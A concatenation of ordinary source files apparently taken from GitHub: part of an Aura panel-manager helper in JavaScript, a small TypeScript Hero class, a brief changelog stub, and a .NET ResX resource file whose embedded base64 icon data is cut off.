} else if($A.util.isFunction(callback)) {
callback(null);
}
},
/*
* Sets the context in which the panel is created
* This is mostly to figure out the relationship between two panels
* This function should be called before stacking a new panel
*/
setPanelOwner: function (panel, givenOwner) {
var owner = givenOwner;
if (!owner) {
var previousBody = null;
if (this.PANELS_STACK.length > 0) {
var previousPanel = this.PANELS_STACK[this.PANELS_STACK.length - 1];
previousBody = previousPanel.isValid() ? previousPanel.get('v.body') : previousBody;
}
owner = $A.util.isEmpty(previousBody) ? panel.getGlobalId() : previousBody[0].getGlobalId();
}
this.PANELS_OWNER[panel.getGlobalId()] = owner;
},
/*
* Stack a panel in our internal structures
*/
stackPanel: function (panel) {
var stackManager = this.smLib.stackManager;
this.PANELS_ZINDEX++;
this.PANELS_STACK.push(panel);
stackManager.bringToFront(panel);
},
/*
* stack an element as if it was a panel
*/
stackElement: function (cb) {
this.PANELS_ZINDEX++;
cb(this.PANELS_ZOFFSET + this.PANELS_ZINDEX);
},
/*
* Create panel instance
* @private
*/
createPanelInstance: function (cmp, config) {
// Internal usage of the panel relies on the AVP to work properly, with no access-check issues,
// but if the panel is created by overlayLibrary, the body could be a custom component,
// for example c:modalContent, which can't access the ui namespace.
var isCustomPanel = config.panelConfig && config.panelConfig.isCustomPanel;
var panel = this.containerManager.createContainer({
containerType : config.panelType,
containerConfig : config.panelConfig,
containerValueProvider : cmp
});
var header = panel.get('v.header'),
body = panel.get('v.body'),
footer = panel.get('v.footer'),
avp = panel,
i, length;
if (!$A.util.isEmpty(body)) {
body[0].setAttributeValueProvider(panel);
// if panel isn't created by overlayLibrary, set AVP to body[0], otherwise keep with panel.
if (isCustomPanel !== true) {
avp = body[0];
}
}
if (!$A.util.isEmpty(header)) {
for (i = 0, length = header.length; i < length; i++) {
header[i].setAttributeValueProvider(avp);
}
}
if (!$A.util.isEmpty(footer)) {
for (i = 0, length = footer.length; i < length; i++) {
footer[i].setAttributeValueProvider(avp);
}
}
return panel;
},
beforeShow: function(cmp, config) {
var panelParam = config.panelInstance,
panelId = $A.util.isComponent(panelParam) ? panelParam.getGlobalId() : panelParam,
panelObj = this.PANELS_INSTANCE[panelId],
panel = panelObj.panel;
this.pushReturnFocusElement(panel);
$A.assert(panelObj, 'Could not find instance to show');
// deactivate all other panels except the one currently shown
this.deactivateAllPanelInstances(cmp, panel);
},
/*
* Destroy panel instance
* @private
*/
destroyPanel: function (cmp, config, doActivateNext) {
config = config || {};
var stack = this.PANELS_STACK,
shouldReturnFocus = config.shouldReturnFocus,
panelParam = config.panelInstance,
panelId = $A.util.isComponent(panelParam) ? panelParam.getGlobalId() : panelParam,
panelObj = this.PANELS_INSTANCE[panelId],
panel = panelObj.panel,
index = stack.indexOf(panel);
// shouldReturnFocus should default to true if it is not explicitly passed in.
if ($A.util.isUndefinedOrNull(shouldReturnFocus)) {
shouldReturnFocus = true;
}
$A.assert(panelObj, 'Could not find instance to destroy');
$A.assert(index > -1, 'Could not find the reference in the stack');
stack.splice(index, 1);
// pop return focus before panel is destroyed.
var returnFocus = this.popReturnFocusElement(panel);
this.containerManager.destroyContainer(panel);
delete this.PANELS_OWNER[panelId];
delete this.PANELS_INSTANCE[panelId];
// Notify the destroy
config.onDestroy && config.onDestroy();
if (panelObj.destroyCallback) {
panelObj.destroyCallback(panelId);
}
if (doActivateNext !== false) {
this.activateNextPanel(cmp);
}
// Set the return focus. This has to happen after activating the next panel (above), otherwise activate will steal the focus.
if (panel.closedBy !== "closeOnClickOut" &&
shouldReturnFocus === true && returnFocus) {
returnFocus.focus();
}
// this will happen if a panel is destroyed
// without being closed first
if(!panelObj.panel._transitionEndFired) {
var element = panelObj.panel && panelObj.panel.isValid() ? panelObj.panel.getElement() : null;
// listeners still need to know the panel is gone
$A.getEvt("markup://ui:panelTransitionEnd").setParams({
action: 'hide',
panelId: panelId,
hasGlassBackground: (element || document).querySelector(".modal-glass") !== null
}).fire();
}
},
/**
* Activate the next candidate panel in the stack
* @private
*/
activateNextPanel: function() {
// find the panel to activate
for (var panel, i = this.PANELS_STACK.length - 1; i >= 0; i--) {
panel = this.PANELS_STACK[i];
if (panel && panel.isValid() && panel.get('v.visible') && !panel.destroyPending) {
panel.setActive(true);
break;
}
}
},
/**
* Deactivate all the panels except the active one
* @param cmp
* @param activePanel
*/
deactivateAllPanelInstances: function(cmp, activePanel) {
for (var panel, i = this.PANELS_STACK.length - 1; i >= 0; i--) {
panel = this.PANELS_STACK[i];
if (panel && panel.isValid() && panel !== activePanel) {
panel.setActive(false);
}
}
},
/*
* Rendering the panel
* We call $A.render because we want to render the component immediately
* so we can send it back synchronously to the user
* @private
*/
renderPanelInstance: function (cmp, panel, config) {
this.containerManager.renderContainer(panel, config);
},
notifyPanelContent: function (content, config) {
var validInterface = config.typeOf ? content.isInstanceOf(config.typeOf) : true,
validMethod = content[config.action];
if (validInterface && validMethod) {
content[config.action](config.payload); // dispatch the method
}
},
broadcastNotify: function (cmp, source, config) {
var scope = config.scope,
currentTarget = config.currentTarget || this.getContainerPanelId(source),
stack = this.PANELS_STACK,
owner = this.PANELS_OWNER[currentTarget],
panel, content, i;
$A.assert(!scope || (scope !== 'all' || scope !== 'owner' || scope !== "self"), 'Invalid target (all || owner)');
if (scope === 'all') {
for (i = stack.length - 1; i >= 0; --i) {
panel = stack[i];
if (currentTarget !== panel.getGlobalId()) { // Don't notify itself
content = panel.get('v.body')[0];
this.notifyPanelContent(content, config);
}
}
} else if (scope === 'self') {
if (currentTarget) {
currentTarget = $A.getComponent(currentTarget);
this.notifyPanelContent(currentTarget.get('v.body')[0], config);
}
} else if (owner) {
var ownerCmp = $A.getComponent(owner);
if (ownerCmp && ownerCmp.isValid()) {
this.notifyPanelContent(ownerCmp, config);
}
}
},
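/*
Illustrative call shape for broadcastNotify (a sketch only; the interface name,
action name and payload below are assumptions, not defined in this file):
  helper.broadcastNotify(cmp, sourceCmp, {
    scope  : 'all',              // 'all' | 'self' | anything else notifies the owner panel
    typeOf : 'ui:panelContent',  // optional interface filter used by notifyPanelContent
    action : 'onPanelNotify',    // method invoked on each matching content component
    payload: { reason: 'refresh' }
  });
*/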
getContainerPanelId: function (source) {
var provider = source;
while (provider) {
if (provider.isInstanceOf("ui:panelType")) {
return provider.getGlobalId();
}
source = provider.getAttributeValueProvider();
provider = source !== provider ? source : null;
}
},
/**
* Get a flag to indicate whether we should close the panel when the locationChange event is fired.
*/
getLocationChangeFlag: function (cmp, config) {
var closeOnLocationChange = config.closeOnLocationChange;
if ($A.util.isEmpty(closeOnLocationChange)) { // not set, get it from panel manager
closeOnLocationChange = $A.util.getBooleanValue(cmp.get('v.closeOnLocationChange'));
} else {
closeOnLocationChange = $A.util.getBooleanValue(closeOnLocationChange);
}
// add a handler if needed
if (closeOnLocationChange === true && this.hasLocationChangeHandler === false) {
var that = this;
$A.eventService.addHandler({
"event": "aura:locationChange",
"globalId": cmp.getGlobalId(),
"handler": function() {
for (var panel, panelObj, i = that.PANELS_STACK.length - 1; i >= 0; i--) {
panel = that.PANELS_STACK[i];
panelObj = that.PANELS_INSTANCE[panel.getGlobalId()];
if (panel && panel.isValid() && panelObj && panelObj.closeOnLocationChange === true) {
panel.close();
}
}
}
});
this.hasLocationChangeHandler = true;
}
return closeOnLocationChange;
},
/**
* Stack the element to be focused when the panel is destroyed.
* @param panel
* @private
*/
pushReturnFocusElement: function(panel) {
var returnFocusElement = panel.get('v.returnFocusElement');
var util = this.focusLib.stackUtil;
if ($A.util.isUndefinedOrNull(returnFocusElement)) {
returnFocusElement = util.getRealActiveElement();
}
util.stackFocus(returnFocusElement);
},
/**
* Return the element to be focused when the panel is destroyed.
* @param panel
* @private
*/
popReturnFocusElement: function(panel) {
var selector = panel.get("v.returnFocusElementSelector");
var focusElement = this.focusLib.stackUtil.popFocus(panel);
if (selector) {
focusElement = document.querySelector(selector);
}
return focusElement;
}
})// eslint-disable-line semi
| {
"pile_set_name": "Github"
} |
export class Hero {
id: number;
name: string;
}
| {
"pile_set_name": "Github"
} |
Changelog
---------
* Adding several tables to create a schema structure for tournaments, including a main tournament table,
  a participants and spectators table, a scoring table, and a games table.
Updating
---------
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goal of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>
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
